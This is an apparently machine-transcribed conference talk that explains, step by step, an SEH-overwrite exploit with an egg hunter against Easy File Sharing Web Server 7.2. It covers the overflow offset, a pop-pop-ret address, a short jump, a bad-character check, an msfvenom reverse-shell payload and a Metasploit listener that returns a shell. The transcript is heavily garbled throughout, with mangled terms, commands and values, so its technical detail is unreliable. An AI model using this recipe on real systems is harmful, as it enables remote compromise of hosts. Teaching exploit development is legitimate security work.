From SEH Overwrite with Egg Hunter to Get a Shell

Hello everyone, welcome aboard to my talk. I'm glad to be here with you all. My talk is called "From SEH Override with Egg Hunter to Get a Shell". A little about me. My name is Rodolfo Concordi, but you can call by my nickname Rodox. I am a penetration tester, instructor of IT, consultant of information security throughout 13 years, certified ethical hacker by the IC Council. I already gave talks at conferences as Hack in the Box, Ecoparty, Arabsture Conference, Mortar and Lucon, StackConf, Redditing Village, besides Colgales, besides ATEMS, etc. I'm author of Hacking9 Magazine about Stack Overflow and Paint Test Magazine about Covered Channel from Frozen to Lettershell from SE8 Override to Lettershell. I leave here my LinkedIn profile by email

for who want to write me, for take out some doubts, can write me in my LinkedIn profile by email. Our agenda. We will see SE8, Structural, Exception Handler, Buffer Bear Flow. We have a POC. In POC we will see SE8, Override, Short Junk, Egg Hunter, Bad Characters, Reverse Shell and we have a Questions. Open for the questions.

ExceptionHandler. ExceptionHandler is a chunk of code from inside of an application which has the objective to handle any exception that can occur during the execution of software. The ExceptionHandler looks like with this image. In ExceptionHandler we have try and catch. Try executes some code, if occurs some exception should jump to the catch. So, if we cause some exception in try, the flow of execution will jump for the catch. Catch is executed from a specific code when an exception occurs. An exception is an unexpected event, an error, that occurs in a running system or a program. When an exception occurs, the program's normal flow of execution is interrupted. It's important to that the application can handle

the exception or error to continue running normally. The address of the exception handler is stored on the stack. The Windows OS has the full handler that catches any exception that is not handled by the program. When Windows handles an exception in an application, you will usually see the message: "Program has encountered a problem and needs to close". So, these softwares usually have their own exception handler. But when the exception handler for the software doesn't work, the exception handler of Windows works. And the usual message of the reception handler of Windows is: "Program has encountered a problem and needs to close." The SE8. The SE8 works in a chain, and it is localized in the end of the stack. In the class to buffer flow "vanilla",

the exploit overwrites the returned address without worrying about writing more bytes in the stack. But with the SE8 override technique, it's possible to obtain more space for the shellcode in order to have an exploit more stable. So, as we can see in this image, this SE8, the structure exception handler, works in a chain, because in the first address, try to manipulate the exception here, If it isn't possible, we'll jump for the next SE8 record. So we try to manipulate the error here. If it isn't possible, we'll jump for the next SE8 record. Here we have buffer overflow. Buffer overflow is a nomadic error program while writing data to a buffer over the buffer boundaries and overrides the adjacent

memory location. Might be WIP-based and stack-based. We have the memory, which allocates a large amount of data and the dynamic. Stack-based, allocates a limited or fixed size of data, such as data from local variables or functions. Here we have an image of the buffer workflow. We have left images with a variable 4 with 11 As and the right images with a variable 4 with 150 As. In this right image, we can see that over right are registered EBPs. In this case, it occurs here a stack overflow. We have here in the right image a stack overflow. And we have at the end of the stack, we have an area of SE8. We have the end of the

stack SE8. So we have here override SC8 with character "a". So, as I already said, the SC8 structure exception handler is localized in the end of the stack. Now we have a POC. In this POC we use it to attack Kali Linux version 2020.3 and the vulnerable software Edifier Sharing Web Server 7.2 running on Windows XP Service Pack 3. This vulnerable software can run in other operating systems like Windows 8, Windows 10, etc. But in this case we use Windows XP X Service Pack 3. Here we have a link for the download of vulnerable software. For who want, after this talk, I'll make available on my LinkedIn profile these slides for who want to see again these slides. Because these slides have step by step

how you can write or exploit code using SE8 override technique with EggHunter. Now you will learn more about SE8 override in the EggHunter. So let's see the video POC. Let's see the video POC. Let's run the EasyFileShareWeb server vulnerable software. Running vulnerable software. Open the Immunity Debugger. Attach menu file. Attach. Attach the vulnerable software Immunity Debugger. Attach the vulnerable software Immunity Debugger. Run the vulnerable software Immunity Debugger. In Kali Linux, let's open the exploit code. Open the exploit code. This exploit code was wrote in Python. We have variable crash1 with a lot amount of characters. With a lot amount of characters, we will send against the typed IP, import 8 in method get. We will send the salot amount of

characters against the target IP in part 8 in method get, with objective of custom crashing this software. For generating the salot amount of characters, we will use a tool "parneCreate". -l delink 5000. And then we have a lot amount of characters. We must generate this a lot amount of characters for after discovering the offset of SEH. And paste this a lot amount of characters in our exploit code.

paste the selected amount of characters in our exploit code. We have method get plus crash1 plus HTTP. We will send this crash1 selected amount of characters against the target IP in point method get. And save the exploit code. Now let's send the exploit code against the target.

and we have here an ax violation. We have a Stack Overflow Clicking MinuView, SEH chain, and we have in MinuView SEH chain, we have a value in SEH, because we overwrite the SEH handler, we overwrite the SEH. Now we need to find the offset of SEH, we need to find the offset of SEH. For this, we use two parent offsets, parent offset -l link 5DAUS-Q and the value in SH chain, the value in SH chain for finding the offset of SH. And we found the offset for DAUS 65. For DAUS 65, its offset to arrive in SE8 chain. Let's open the exploit code. Now we have variable crash1, character A multiplied by 4.061, this offset

for SE8, plus B multiplied by 4, plus C multiplied by 4, plus 9. 9 means no operations, means loops. Again, 990 means nukes, means no operations, because do nothing. It's just to fill the software. Let's save the exploit code. Let's restart the Munir debugger. Run the vulnerable soft in Munir debugger again. Now let's send the exploit code.

Menu View, SE8 chain, and now we have SE8, we have 42, 42, 42, and 43, 43, 43. Click right button. following address in stack, following address in stack, and as we can see, we have SE8 recorded with BBBCCCC. We overwrite the SE8 recorded. Again, as we can see now, we overwrite SE8 recorded with BBBCCCC. We get a control of SE8 recorded. We get a control of SE8 recorded. Now, we need to override the SEH record with pop-pop return and short jump instruction. We need to find... We need to override SEH record with pop-pop return and short jump instruction. For this, type in command bar "!mona seh" After clicking menu view, log, menu view log, and we have here only

the first 20 points I show here. For more pointers, open se8.txt. Let's open the folder of the Immunity Debugger, program files, Immunity, Immunity Debugger, and open the file "se8.txt". Let's learn for what we need to find a pop-up return address. Now we need to find in Moodle an instruction "pop-up return". This instruction will, as shown in the image below, make a return to the pointer to next se8 recording. The pointer to the next 8 records will override it with a jump to our shell code to get a reverse shell. As we can see in the image below, we have here an ax violation, In the next violation, we override the current SE handler. We override the SE handler with

a pop-up return. Again, we override the SE handler with a pop-up return. We execute the instruction "pop" return and will make return for pointer to next.s8.record. "to" will return against "pop" pop will return for pointer to next.s8.record. "pointer" to next.s8 was overwritten with "jump" to shellcode. So, after pop-pop return, we return for an instruction of jumping, short jump for our shellcode. We make a short jump for our shellcode. So, we need to find some pop-pop return without secure mechanisms. We need to find some instruction pop-pop return without secure mechanisms.

We use the address 10.0103-FE. 10.0103-FE is an instruction POP-CI/POP-DI return. It has ASNR as false and SAFE as false. We have secure mechanisms ASNR as false and SAFE as false. So we use address 10.0.1.0.3.fe, popci, popdi, return. So we need to override. We need to override se8 with popup return address. So we have here fe0301.10. We type like because the QlArchitecture x86 recur that we type, recur that we write unlike. So we have here se8, variable se8 with pop-up return, and any se8 variable with short jump. For find a short jump, we need to use a tool nasm-shell. We need to use a tool nasm-shell

So we type jump short 8, in NAS we type jump short 8, the opcode for jump short 8 is EB06. EB06 is the opcode for jump short 8. So you should type 99, noops, noops, EB06. EB06 again is the opcode for short jump. So, EB06 is an opcode for short jump 8. So, now we have variable SE8 with pop-up return address, variable NS8 with short jump, and variable CRASH1 with character 8 multiplied by offset, plus NS8, plus SE8, plus 9, that's nukes. So, we will overwrite the se8-chem with any se8 popup return address and with popup return. Let's see how it works. We start the Moodle debugger. We start the Moodle debugger. Run the vulnerable soft Moodle

debugger. Run the vulnerable soft Moodle debugger. Run the exploit code. Run the exploit code. We have ax violation menu view. And now in SE8 chain we have a pop-pop return address and short jump address. Right button, follow address in stack. As we can see, we have in SE8, we have an address for a pop-up return and an address with a value of short jump, 06EB9090. It's an address for a short jump. So we overwrite the SE8 recording with the address for a pop-up return and the address for a short jump. So now let's find the popup return address. Right button, go to expression, 10.0.1.0.3.FE, it's the address for popup return. And we have here popci, popdi return. It's

the address for popup return. Click on the right button, backpoint toggle, let's put the backpoint in popci, back point to stop flow of execution in PopCI. Again, back point will stop flow of execution in PopCI. Let's pass flow of execution with Shift+F7, pass flow of execution with Shift+F7, and after Shift+F7, you click on "Run", click on "Run", and then we have flow of execution stopped in pop CI flow of execution stopped in pop CI pass the flow of execution F7, F7 F7 in return we make a jump in return, jump for loops we have loops, loop, jump, short we have jump short EB06 let's pass loops, loops, jump short EB06 and the jump for our loops.

As we can see, we have our loops. We should put in place of these loops our shell code to make a verse shell. However, we don't have enough space to put our shell code here. Again, we don't have enough space to put our shell code here. For this, we need to use a technique called Egg Hunter. We use now a technique called Egg Hunter. Let's learn more about Egg Hunter. We know that we have a little space to our shellcode. For this, we will use a technique called Egg Hunter. Egg Hunter is a small piece of shellcode which searches for actual bigger shellcode. which the attacker was not able to fill in the available buffer space. For this, make use of this little

piece of shellcode, egg_hunter, to redirect execution flow to shellcode bigger. So, we don't have enough space for our big shellcode, for making a reverse shell. For this, we will put a small piece of shell code, and this small piece of shell code will redirect us to a bigger space where we can put our shell code. Again, this small piece of shell code, called egg_hunter, will redirect us to a bigger space where in this bigger space we can put our shell code to get a verse shell.

So type command bar exclamation mona help egg. Help egg we see here default value is ult. We use this ult after. We use this ult later. Default value in egg hunter is ult. Now type the command bar "!mona egg!" And then we have here this small piece of shell code. This small piece of shell code is called "egg hunter". We need to type, we need to copy, we need to copy this shell code, small pieces of shell code we need to copy, and paste in our exploit code. Copy this small piece of shell code, copy whole line and paste in our shell code, paste in our exploit code, sorry, paste in our exploit code. Let's open

the exploit code. Now we have here egg hunter, we have a small piece of shell code, this egg hunter will redirect us for a bigger space. In this bigger space we can put our shell code to get a versus shell. And we have here variable crash1, character A multiplied by 4061, this offset of the SEA chain.

after we have nsh +sh +90nooks + egg_hunter + 90nooks. So we will send this, we will override the sh chain with popup return address and override the sh chain to jump short, short jump. And we have here payload2 equals bad_shires. We have here this characters 01 up ff. We have a variable bad_shires with character 01 up ff. Let's learn more about bad_shires. What means bad_shires? Now we need to search for bad characters. Depending on the application type of vulnerability any protocol uses, may be certain characters which are considered bad and should not be used in our buffer shell code. One example of bad characters is a "00". this character is considered bad because a new byte is also used to terminate a sync

cooperation, which would truncate our buffer whenever the new byte appears. So, each software has characters that are considered bad. In this case, In our case, we will send this a lot amount of characters since 01upff. We will send, I guess, the target since 01upff for safe of course error. If of course error is due some bad characters. We don't send 00 because we already know that 00 is a bad character. But we send 01 up FF. 01 up FF against the target for see if occurs some error. For see if it has some bad characters. Because we need to avoid when we generate our shellcode, we need to avoid bad characters. Because bad characters cause error. And

we have here "ootoot" plus "payload2". We need to put here "ootoot" to indicate after "ootoot" we have "payload2". And "payload2" equals bad characters, bad chars. Let's save the exploit code, save the exploit code, restart the Moodle debugger, restart the Moodle debugger, run the vulnerable soft Moodle debugger again, right button, go to expression, find the edges for pop-up return, 10.0.0.3.fe, find the edges for pop-up return, right button, in pop-ci, Backpoint toggle to put a backpoint in PopCI. Let's execute our exploit code with Python, XSkeleton, XSkeleton 5, execute our exploit code. We have Axe Violation, press the Axe Violation with Shift + F7, press Shift + F7, Shift + F7 to pass Axe Violation and after press F9, F9 to continue flow

of execution and we arrive in Pop Eci. pass popci with popup return f7, f7 to pass jump short, jump short. And now we have here a small piece of code. This small piece of code is our egg hunter. Again, this small piece of code is our egg hunter. It must redirect us for a bigger space. Right button scans, back point toggle, put a back point in scans, in instruction scans, put a back point in instruction scans, pass flow of execution with play, click in play for run the flow of execution, and this stop in scans, instruction scans, write the button in register in the X, write the button in register in the X, following dump,

and we have we see here which would we see this instruction which after this indicate that after this would we will see our bigger space with our shell code in this case our in this case after jumping in the eye we have our very characters We jump the eye and we have here bad characters 0102030405060708090A0B0C0D0E0F and etc. We have here a lot amount, we have here this character 601 up FF. We have here, we see here a character 601 up FF. As we can see, we don't have error. We have all these characters, since 01 up FF. We have these characters since 01 up FF. We don't have error. We don't have error. This means that the unique bad characters is 0,

0. The unique bad characters that we need to avoid when generating our shellcode is 0, 0. We don't have more bad characters. Again, we don't have more bad characters. Let's restart the Moodle debugger. Restart the Moodle debugger. Restart the Moodle debugger.

Run the vulnerable software in Moodle debugger. Run the vulnerable software in Moodle debugger again. Write button, go to expression, find the popup return address, put a backpoint in popci, with write button, backpoint, toggle, put a backpoint in popci, put a backpoint in popci. Now let's open the exploit code, open the exploit code, And now we have our shellcode. This shellcode was generated by MSFVINO. Shellcode was generated by MSFVINO. Let's generate our new shellcode with MSFVINO. Generate our new shellcode with MSFVINO. We should type msfvino -a architecturex86 - -platform-windows -p of payload window shall reverse TCP -lhost or local IP -lport port for leasing 4444 -e of encode shikataganai -b of bad characters for void 00 -e

times of re-encode payload, three times of encoded payload, -f defile-python, -f defile-python. We generate our shellcode using IMSF Vino. Let's open the exploit code. Let's erase this old shellcode, erase this old shellcode to paste our new shellcode. to paste our new shellcode. As we can see, that generated our new shellcode using MSF Vino. As we can see, we have here variable "cr1", character "a" multiplied by offset of the "se8" chain, plus any "se8", the "nse8" is our jump choice, plus "se8", our pop-up return address, plus 90 multiplied by 5, our loops, plus eggHunter, our eggHunter instruction, plus loops and below payload2 equals BUFF. So we will send the guest target, our character A multiplied by offset offset

of nse8, we will override the se8 chain with pop-up return address. We will send against the target our character a multiplied by offset we overwrite the S8 channel with popup return address and after with short jump after we put plus egg hunter we put a little small piece of shell code it's called egg hunter in this egg hunter In this egg hunter, we will jump for a bigger space. Egg hunter will jump for a bigger space. This bigger space is our payload 2. Payload 2 equals Buffy. Payload 2 equals Buffy. Buffy is our shell code. And we have here Wootie Wootie plus payload 2. Payload 2 is our shell code. Payload 2 equals Buffy.

Now let's copy our shellcode, copy our shellcode and paste our new shellcode, our sprite code. Paste our new shellcode, our sprite code. Hi, Ronaldo. Hello. So, the presentation is going great, but we're just kind of running a little tight on time. I'm finishing. plus five minutes. Sure, so if you want you can just link the video and you can just like give like a small conclusion. I can print the video, save the exploit code. Now let's execute our MetaExploit framework in the MSF console. I'll put this video on the internet and make available on my LinkedIn profile this link for this video. Use multi handler, set payload Windows shell reverse TCP, set payload Windows shell

reverse TCP, set Lhost, your local IP, local IP for get connected back, set Lport 4444 to lithium port 4444, and execute exploit. So this is meta exploit framework, we wait to connect back. Let's execute our exploit code. As we can see, we have in Moodle debugger a stack overflow. We have ax violation. Let's pass ax violation with shift + F7. Shift+F7 to pass Arms Violation. After Shift+F7, press F9 or clicking in the button Run. We arrived in Pop! ECI. Pass Pop! ECI with F7. Pop! Pop! Return. Arrived in Noops. Pass Noops and jump short. Press jump short with F7 and we arrive in our Egg Hunter. we arrive at the egg hunter. Right button scans, back point toggle, put

a back point in toggle, put a back point in scan instruction, back point in scan instruction. Let's see the value in registerDx, right button in dx, right button in dx, following them, we have a value root. After this root, we will have our shell code. Again, after this root, we have our shell code following dump, root, and the pass the scans with F7, jump DI, for jump for bigger space with our shell code, jump for bigger space with our shell code, and we have here our shell code. We have here DA, DC, D9, as we can see in our exploit code, As we can see our exploit code, we have the value DA/DC/D9/74 and we have

in Moodle debugger the value DA/DC/D9/74. We have here our shell code for execute. Clicking run to execute our shell code.

run for executor shell code, we have a meta exploit, we have a shell, we have a reverse shell, we have a reverse shell, net user command for cd user, hodox administrator, and the command ipconfig for cd ip of victim. That's it. In this video you can learn how you can write an exploit code using a technique SE8 override. When we override the SE8 chain with a pop-up return address and short jump to make pop-up return after making a short jump, arriving in egg hunter. After egg hunter, we redirect us for a bigger space, where in this bigger space we can put our shell code. In these slides we have step by step of how you can write on exploit code

using S8 override technique and with AgHunter. That's it everyone, thank you for watching me. Now I open for the questions. Thank you very much.